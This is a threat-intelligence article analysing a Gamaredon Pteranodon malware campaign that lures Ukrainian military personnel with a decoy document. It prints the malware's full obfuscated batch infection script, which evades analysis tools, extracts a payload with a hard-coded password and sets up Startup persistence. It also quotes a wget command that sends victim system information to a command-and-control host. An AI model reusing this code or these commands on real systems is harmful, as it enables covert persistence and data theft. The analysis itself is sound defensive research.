Security researchers at Yoroi-Cybaze ZLab uncovered a new campaign carried out by the Russian state-actor dubbed Gamaredon.

Introduction

Few days after the publication of our technical article related to the evidence of possible APT28 interference in the Ukrainian elections, we spotted another signal of a sneakier on-going operation.



This campaign, instead, seems to be linked to another Russian hacking group: Gamaredon. The Gamaredon APT was first spotted in 2013 and in 2015, when researchers at LookingGlass shared the details of a cyber espionage operation tracked as Operation Armageddon, targeting other Ukrainian entities. Their “special attention” on Eastern European countries was also confirmed by CERT-UA, the Ukrainian Computer Emergency Response Team.



The discovered attack appears to be designed to lure military personnel: it leverage a legit document of the “State of the Armed Forces of Ukraine” dated back in the 2nd April 2019.



Figure 1: Fake document shown after infection

For this reason, Cybaze-Yoroi ZLAB team dissected this suspicious sample to confirm the possible link with Russian threat actors.

Technical Analysis

The origin of the infection is an executable file pretending to be an RTF document.



Sha256 41a6e54e7ac2d488151d2b40055f3d7cacce7fb53e9d33c1e3effd4fce801410 Threat Gamaredon Pteranodon stager (SFX file) Ssdeep 12288:VpRN/nV+Nn3I4Wyawz2O7TE+sNEAMqdJnGB6q5c7pQbaOwWsAsK0iR7bkfeanZ8O:VpT/nV+N3I

Table 1: Information about analyzed sample



Actually, the file is a Self Extracting Archive (SFX) claiming to be part of some Oracle software with an invalid signature. Its expiration date has been set up the 16th of March 2019.



Figure 2: Fake Oracle certificate with an expiration date set on 16th of March 2019

A first glance inside the SFX archive reveals four different files. One of them is batch file containing the actual infection routine.



Figure 3: Files contained in SFX archive

@echo offset xNBsBXS=%random%*JjuCBOSFor %%q In (wireshark procexp) do (TaskList /FI “ImageName EQ %%q.exe” | Find /I “%%q.exe”)If %ErrorLevel% NEQ 1 goto exitIf SddlzCf==x86 Set WqeZfrx=x64if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset “ldoGIUv=%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\”CEFNPKLIf SddlzCf==x86 Set WqeZfrx=x64set “UlHjSKD=%USERPROFILE%”set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset fnQWAZC=winsetupset xNBsBXS=%random%*JjuCBOSset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset “paJvVjr=Document”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset eBqwVLK=%fnQWAZC%.lnkCEFNPKLif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSset YFCaOEf=28262set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSset vvozoFB=11326set lDwWuLo=26710If SddlzCf==x86 Set WqeZfrx=x64set prJqIBB=dcthfdyjdfcdst,tvset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOStaskkill /f /im %fnQWAZC%.exeCEFNPKLRENAME “%lDwWuLo%” %lDwWuLo%.exeset xNBsBXS=%random%*JjuCBOS%lDwWuLo%.exe “-p%prJqIBB%set qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXScopy /y “%fnQWAZC%” “%UlHjSKD%\%fnQWAZC%.exe”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSif exist “%UlHjSKD%\%fnQWAZC%.exe” call :GhlJKaGIf SddlzCf==x86 Set WqeZfrx=x64if not exist “%UlHjSKD%\%fnQWAZC%.exe” call :PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%YFCaOEf%” %eBqwVLK%if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOScopy “%eBqwVLK%” “%ldoGIUv%” /yset qKLGBsL=%SddlzCf%+%JjuCBOS%-xNBsBXSRENAME “%vvozoFB%” “%paJvVjr%.docx”if SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOS”%CD%\%paJvVjr%.docx”set xNBsBXS=%random%*JjuCBOSexit /b

:GhlJKaGif SddlzCf==qKLGBsL set SddlzCf=%random%*xNBsBXS-JjuCBOSstart “” “%UlHjSKD%\%fnQWAZC%.exe”CEFNPKLexit /b

:PEEnqrLset xNBsBXS=%random%*JjuCBOSRENAME “%fnQWAZC%” %fnQWAZC%.exe::6start “” “%fnQWAZC%.exe”If SddlzCf==x86 Set WqeZfrx=x64exit /b



Firstly, this batch script looks for the presence of running Wireshark and Process Explorer programs through the tasklist.exe utility. Then it renames the “11326” file in “Document.docx” and opens it. This is the decoy document seen in Figure 1.



The third step is to extract the contents of the password protected archive named “26710”. The scripts uses the hard-coded password “dcthfdyjdfcdst,tv” to extract its content, placing them it on “%USERPROFILE%\winsetup.exe” and creating a LNK symlink into the “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\” directory to ensure its persistence.



Sha256 653a4205fa4bb7c58ef1513cac4172398fd5d65cab78bef7ced2d2e828a1e4b5 Threat Gamaredon Pteranodon stager (SFX) Ssdeep 12288:9pRN/nV+Nn4mNoks/EysKvqjigldJuFjBqg9DmTBs34I8:9pT/nV+N4QokKK7zg9qgQI8

Table 2: Information about SFX stager



This additional file is a SFX file containing another script and a PE32 binary.



Figure 4: Files contained in SFX archive

“MicrosoftCreate.exe” file is the UPX-packed version of the “wget” tool compiled for Window, a free utility for non-interactive HTTP downloads and uploads, a flexible tool commonly used by sys-admins and sometimes abused by threat actors.

The actual malicious logic of the Pteranodon implant is contained within the “30347.cmd” script. Besides junk instructions and obfuscation, the malware gather information about the compromised machine through the command “systeminfo.exe”. The results are stored into the file “fnQWAZC” and then sent to the command and control server “librework[.ddns[.net”, leveraging the wget utility previously found.



Figure 5: The C2 and obfuscations technique

MicrosoftCreate.exe –user-agent=”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0″ –post-data=”versiya=arm_02.04&comp=ADMIN-PC&id=ADMIN-PC_del&sysinfo=Nome host: ADMIN-PC+###…….”

Figure 6: Information about victim machine sent to C2

The malware also schedules the execution of two other actions.



Figure 7: Persistence through task schedule

The first one tries to contact “bitwork[.ddns[.net” to download a “setup.exe” file and store it in the same folder. The other file, “ie_cash.exe”, is stored into the “%APPDATA%\Roaming\Microsoft\IE\” folder. Despite the different name, it actually is another copy of the wget tool.



Figure 8: Persistence through task schedule (II)

The second scheduled activity is planned every 32 minutes and it is designed to run the files downloaded by the previous task. A typical trick part of the Gamaredon arsenal from long time: in fact, the recovered sample is part of the Pteranodon implant and matches its typical code patterns, showing no relevant edits with respect to previous variants.



In the end, investigating the “librework[.ddns[.net” domain we discovered several other samples connect to the same C2. All of them appeared in-the-wild during the first days of April, suggesting the command infrastructure might still be fully functional.

Figure 9: other samples linked to “librework[.ddns[.net” C2 (Source:VT)

Conclusion

The Pteranodon implant seems to be constantly maintained by the Gamaredon APT group since 2013, a tool the attackers found very effective since they are still using it after such a long time. Apart this technical consideration, is quite interesting to notice how strong seems to be the Russian interest towards the East-Europe, along with the other recent state-sponsored activities possibly aimed to interfere with the Ukrainian politics (See “APT28 and Upcoming Elections: evidence of possible interference” and Part II), confirming this cyber-threat is operating in several fronts.

Further details, including Indicators of Compromise and Yara rules, are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – Ukraine, Gamaredon)